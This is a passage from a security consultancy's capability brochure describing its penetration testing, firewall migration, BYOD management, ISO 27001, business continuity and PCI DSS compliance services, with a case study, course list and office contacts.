vulnerabilities found in Web Applications creating a significant impact on our clients’ enterprises and the privacy of the end
users. Business losses can include loss of data, public image and loss of confidence.
network risk assessmentS
A thorough evaluation of network security posture is mandatory to enable our clients to answer the following fundamental
questions:
Our Web Application Security Testing allows our
clients to:
• Get instant feedback and catch hidden bugs before
launch
• Create higher quality applications as they are tested
by certified QA experts
• Deploy applications faster by testing throughout the
development process
• Use global testing coverage by testing across
operating systems, browsers, languages and more
• Allow our clients to gain a better understanding of
potential website vulnerabilities that may be visible
from the Internet
• What is their enterprise security strategy? And what
can be done to protect it in a better way?
• Where are the weaknesses in their security policies
and architecture?
• How can they make security data actionable and
get timely compliance reports to address audit
requirements?
• How much does an effective risk management
solution cost?
Features include:
Our Network Risk Assessment includes:
• A Security Policy Audit – evaluating security policies
based on availability, business continuity and
compliance requirements; it also establishes key risk
factors and security metrics
• A Technical Security Evaluation – analyzing the
security architecture in the context of security
policies and control objectives to uncover
vulnerabilities
• A Threat Management Assessment – examining
threat identification, investigation and incident
response processes
• Disaster Recovery Business Continuity Planning
– to ensure that plans for returning systems to
operational standards are in place
Features include:
WEB APPLICATION SECURITY TESTING | NETWORK RISK ASSESSMENTS
Black Box Testing Grey Box Testing White Box Testing
We perform attack testing assuming the identity
of an external attacker/hacker.
With no inside information
about the application..
We receive basic information about
design function of the Web app.
We receive complete information,
coding, infra, architecture.
Grey Box testing is a fusion of
black white box testing.
Full Source code infrastructure review
17. INFORMATION SECURITY | CAPABILITY STATEMENT | 31
Step 1:
Current state
assessment
firewall migration services | network architecture review
Firewall Migration Services
Firewall technology longevity typically spans from between 5-7 years and upgrades are often initiated by growing
organizations and changing security requirements. A firewall is an item of critical network security infrastructure and any
change in technology is fraught with risks to business continuity.
Si’s professional services team can assist organizations from applying a standard methodology to executing a firewall
migration. Each migration project deployed is unique and represents a different set of challenges, the key to our success is to
treat each case with the same level of care and professionalism.
What did we learn?
The client recovered the cost of the firewall migration project through lower cost of operations, reduced security risks, more
efficient administrative and maintenance processes, and ultimately a more satisfied customer base.
Baseline Assessment Requirements Planning
Step 1
FW Architecture
Assessment
Step 2
FW Health Check
Performance Review
Step 3
FW Policy
Compliance Review
Step 4
FW Module Protection
Level Assessment
Step 5
Migration Config
Validate
Step 6
Migration Cut Over
Monitoring
Migrate
Analysis of:
- Firewall logs
- VPN’s
- Installed software / patch level
- Bugs fixed in new versions
- Utilisation of hardware
components
Review of:
- Hard disk capacity and usage
and CPU memory usage
- Network interface…
• ..throughput
• ..capacity
• ..availability
- Analysis of logs, errors and
syslog
- Firewall config
Review violation of:
- Corporate policy,
- Industry standards and best
practices
- FW Rules Optimisation
Review of the protection level
achievable with current
Architecture.
Recommend upgrades and
additional modules
Lab Based Configuration
Validation. prior to roll out and
cut over.
On site:
- Traffic migrated from old to
new
- Troubleshoot
- Monitor
- Handover training
Firewall Migration Road Map
• We determine security strategies and support our clients’ business objectives
• We implement policies where required and we establish new policies should they be required
• We put in place effective risk mitigation and regulatory compliance
• We analyse, manage and report
• We review existing policies and frameworks and make recommendations where necessary
• We audit existing policies for example ISO 27001/PCI to ensure compliance
• Our aim is to set out a road map detailing short, medium and long term goals
Network Architecture Review
Si utilises its vast experience and knowledge to act as professional assessors with respect to the security architecture of our
clients’ networks.
Our consultants analyze every key aspect of the architecture including:
• Logical and physical design
• Security technology inventory
• Asset inventory
• Outbound and inbound connectivity
• Security procedures and processes
• Network topology
• Network and host access controls
• Log-in procedures and authentication requirements
• Business continuity plans
• Containment and incident response procedures
• Health of security controls
For each key area, and for the infrastructure as a whole, Si consultants identify and document the following 4 Steps:
Step 2:
A vision for
a future state
Step 3:
A Gap analysis
Step 4:
Recommendations
for closing gaps
What are the facts?
• $1.1 Million firewall migration project for this client
generates fast payback for customer
• The client is an IT managed services provider serving
over 11,000 community-based banks, credit unions,
and insurance agencies. This engagement calls for
migrating 45 McAfee Sidewinder firewalls to Cisco
ASA firewalls
The client decided to change their technology following a
history of frequent McAfee Sidewinder platform crashes
that negatively impacted their end customer satisfaction. Si
began by performing a proof-of-concept project to migrate
one firewall in our lab before the full scale roll out.
Case Study: Firewall Migration – Fortune 500 Financial Services Institution (2012)
18. INFORMATION SECURITY | CAPABILITY STATEMENT | 33
System wipe
The bullet. Your IT department needs to be able to
wipe the system if it believes its security has been
compromised.
App security
Some applications could compromise the security of
your business data, so you'll need an application
control system in place to prevent blacklisted apps
being downloaded once the device is hooked up to
your network.
Management
The IT department needs to
select a mobile device
management system. Look
out for one that offers
simple user interfaces as
well as the security features
you need.
Identification
If a wide range of users and
devices are to be allowed access
to the network, it is critical to
identify and authenticate each
device and user.
Security
With sensitive information being
transmitted, security is top of the list.
Allowing BYOD doesn't mean sacrificing
security. IT must establish WiFi security,
VPN access and ideally add-on software
to protect against malware.
Data waiver
Personal and business data can be easily mixed on
personal devices, so employers need to protect
themselves if it goes wrong. If the device is lost or
stolen, employers may need to destroy all data –
employees should sign a waiver agreeing to this
before being allowed to use their own device.
Bring Your Own Device (BYOD)
When an organization is considering implementing a BYOD policy they will generally be asking; what sort of Mobile Device
Management will need to be implemented? What systems must employees have mobile access to? What level of security will
need to be implemented?
Si provides consulting services to deliver the right solution to enable our clients to manage and secure both their networks
and also how to control the use of mobile applications on personal devices across their network.
Bring your own device (byod)
Secure Manage Mobile Devices with
Si partners with MobileIron who offer the platform to
manage mobile apps for business users. The MobileIron
platform provides both the tightest security and best
end-user experience for the distribution, delivery and
management of mobile applications, docs and devices for
global organizations.
Manage the Network
Step 1
High Performance
Network Infra
Step 2
Security
Step 3
Acccess
Step 4
Acceptable Use
Policy
Step 5
Manage the Apps
Step 6
Manage the Data
Manage the Mobile Device
Your network needs to be
able to cope with the
influx of personal devices
connecting to it.
Support the secure
connection of devices,
whether they are
connecting from inside or
outside the office.
Set policies around what
devices to connect to the
network, and what
network areas they have
access to.
Develop specific
stipulations to govern the
use of the new
technologies such as
smartphones and tablets.
Control access to the
camera, application
stores, Internet browser,
YouTube, and explicit
content.
Control access to
documents and data
shared over the mobile
device.
Secure Manage the Network with ISE
Si has pioneered the implementation of BYOD management
through collaboration with Cisco ISE and are selected as
1 of only 10 worldwide delivery partners. The technology
allows:
• Consistent enforcement of context-based policies
across wired and wireless networks
• System-wide visibility showing who and what is on
the network - wired, wireless, or VPN
• Accurate device identification using ISE-based
probes, embedded device sensors, active endpoint
scanning
• Greater visibility and control of the endpoint with
Mobile Device Management solution integration*
19. It took was a small number of employee log-in details to be
compromised for hackers to obtain the entire customer database. As
a result 128 million people – equivalent to twice the population of
Britain – had to change their passwords!
The eBay Hack, May 2014
Si offers a range of compliance services based on industry best practices. Our lead compliance advisors/auditors are leaders in
their field and in certain instances are sector specialists such us banking, finance and government.
Services include:
• Compliance consulting, implementation and
management
• Compliance certification readiness audits
• Business continuity planning (BCP)
• Security awareness and ITIL training
• Compliance services covering:
- ISO 27001:2005
- ISO 2000
- BS 25999
- ITIL
- COBIT
- HIPAA
- PCI DSS
- SAS 70
- SOX
20. INFORMATION SECURITY | CAPABILITY STATEMENT | 37
Information Security Management System - ISO 27001
What is ISO 27001?
ISO 27001 is a set of ‘best practice’ controls for the
management of systems that enable our clients’
organizations to demonstrate that ‘best practices’ are
implemented and ‘continually’ improved.
Information Security Management System
The Information Security Management System (ISMS)
provides a control framework to protect information
assets. This combines management controls, technical
controls, procedural controls personnel controls to
name a few. The controls combine preventive, detective,
restorative, maintenance and monitoring controls.
The Approach for Successful Certification?
We typically apply four phases to the successful delivery of
an ISMS process and we can demonstrate proven success
with some of the most successful organizations in the
Fortune 500 index.
What is Business Continuity Planning (BCP)
Management?
Business Continuity Planning Management “identifies
an organization’s exposure to internal external threats
synthesizes hard soft assets to provide effective
prevention recovery for the organization, while
maintaining competitive advantage value system
integrity” (Elliot, Swartz Herbane, 1999)
Our Approach to BCP Compliance
BS 25999 is BSI’s standard in the field of Business
Continuity Management (BCM) and can be applied to any
organization in any location globally. Si are specialists at
applying this standard which includes guidance on the
processes, principles and technology recommended for
BCM and the specification of a set of requirements for
implementing, operating and improving a BCM System
(BCMS).
4 Key Benefits of ISO 27001 Implementation
1. Compliance
ISO 27001 can provide the methodology to enable an
efficient way to comply with regulations regarding data
protection, security IT governance.
2. Marketing edge
ISO 27001 can be a unique selling point, especially if
handling clients’ sensitive information.
3. Lowering the expenses
Information security is usually considered as a cost with no
obvious financial gain. However, there is financial gain if
you lower your expenses caused by incidents.
4. Putting your business in order
ISO 27001 is particularly good for putting businesses in
order – it forces organizations to very precisely define both
responsibilities and duties, and therefore strengthens the
internal organization.
BUSINESS CONTINUITY PLANNING (BCP) MANAGEMENT
information security management system - iso 27001 | business continuity planning management
The ISO 27001 standard is divided into management
system controls comprising 11 domains which in turn
have a further 133 detailed controls:
• Security policy
• Organization of information security
• Asset management
• Human resources security
• Physical and environmental security
• Communications and operations management
• Access control
• Information systems acquisition, development
maintenance
• Information security incident management
• Business continuity management
• Compliance
What are we planning for?
• Random failure of mission-critical systems
• Epidemic
• Earthquake
• Fire
• Flood
• Cyber attack
• Sabotage (insider or external threat)
• Hurricane or other major storm
• Utility outage
• Terrorism/Piracy
• War/civil disorder
• Theft (insider or external threat)
Objectives policies
Gap analysis
Risk assessment
Risk treatment plan
Implement controls
Training awareness
Monitor, review refine
Management review
Documentation
Verification
Certification
Phase I
Planning
Phase II
Implementation
Phase III Phase IV
Certification
Training Business Process Test Process RefreshRecovery Requirement
Analysis
Business Impact Analysis (BIA) Disaster Recovery Design Crisis Command Team call-out
Solution Design Testing Maintenance
Threat Risk Analysis (TRA)
Crisis Management -
Command Structure
IT Failover Plan
Technical Swing Test
IT Applications Test
Verify - Tech solutions
Verify – Recovery ProceduresImpact Assessment
21. Compliance Security Skills Training
To enhance our compliance consulting services in the field of ISO 27001, Business continuity Management (BS 25999) and ITIL
we offer courses to enable our clients to take ownership of their compliance needs.
Our courses are delivered with a combination of inhouse trainers and experienced consultants from the UK.
Course Owner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Si Partner
Course Name
1. Implementation and Audit – ISMS-ISO 27001
2. Implementation and Audit – ITSM-ISO 20000
3. Implementation and Audit – BCMS- ISO 22301
4. Internal Auditor - ISO 27001
5. Business Impact Analysis
6. ISO 27005
7. Network Security Assessment
8. Application Security Assessment
9. Business Continuity Management
10. PCI – DSS
11. An Integrated Management System
12. Security Operation Centre Design Delivery
13. SOC SIRT Optimization
Duration
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
2 Days
INFORMATION SECURITY | CAPABILITY STATEMENT | 39
PCI Compliance Payment Card Industry Security
Si offers a full range of PCI Compliance Consulting services to satisfy the requirements of the Payment Card Industry Data
Security Standards (PCI DSS) compliance. Si is a PCI Approved Scanning Vendor (ASV).
What is PCI DSS?
The PCI Data Security Standard (DSS) was developed by
the PCI Security Standards Council, and is enforced by the
payment card issuers. It is designed to protect consumers
and businesses, and to encourage the global adoption of
consistent data security measures. The PCI DSS comprises
12 broad requirements which organizations must meet to
maintain compliance.
PCI DSS compliance requires any organization that
transmits, processes, or stores data that contains payment
card information to protect the privacy and confidentiality
of that data. In addition to retailers, the PCI DSS standards
affect financial institutions, healthcare providers,
transportation service providers, the food and hospitality
industry, and payment service providers, among many
others.
Information Security Programme
In itself PCI does not address an organization’s information
security and as such we recommend in addition to the
requirements of PCI compliance a strong framework should
be established to provide a strong information security
environment. By focusing on a broader security program,
organizations can mitigate potential data security breaches
and cyber security attacks, which will lead to better service
to customers and increased profitability.
PCI DSS Trends
Several trends have accelerated the need for PCI DSS
compliance and payment security. While the payment
card brands have been actively enforcing PCI compliance
for Level 1 merchants the past few years, they are now
enforcing compliance for Level 2 - 4 merchants as well.
Merchants that are non-compliant can face substantial
fines and the threat of having payment card privileges
revoked.
PCI COMPLIANCE PAYMENT CARD INDUSTRY SECURITY | Compliance security skills training
22. INFORMATION SECURITY | CAPABILITY STATEMENT | 41
INDIA
305/310 Owner’s Industrial Estate
Gabriel Road, Mahim,
Mumbai, India 400016
T: +91 22 2445 4725
UK
1st
Floor
6 Bevis Marks
London
EC3A 7BA
T: +44 (0)7481 804622
Contact Us GLOBAL SECURITY OPERATION CENTRES
California, USA
USA Co-Location
Data Centre
New Jersey,
USA
Dubai, UAE
Pune, India
Global Soc
www.siconsult.com
info@siconsult.com
UAE
Al Barsha Business Point
Office 501, Al Barsha One
P.O. Box 283996
Dubai, UAE
T: +971 4 354 9535
F: +971 4 354 9536
London, UK
CONTACT US | GLOBAL SECURITY OPERATION CENTRES
New York
2137 Route-35
1st
Floor Holmdel,
NJ 07733
United States
T: +1 732 444 4404
23. Si’s Multi-disciplinary Capabilities:
• Information Security
• Security Consulting
• ICT Consulting
• Building Technology
• Engineering Integration Management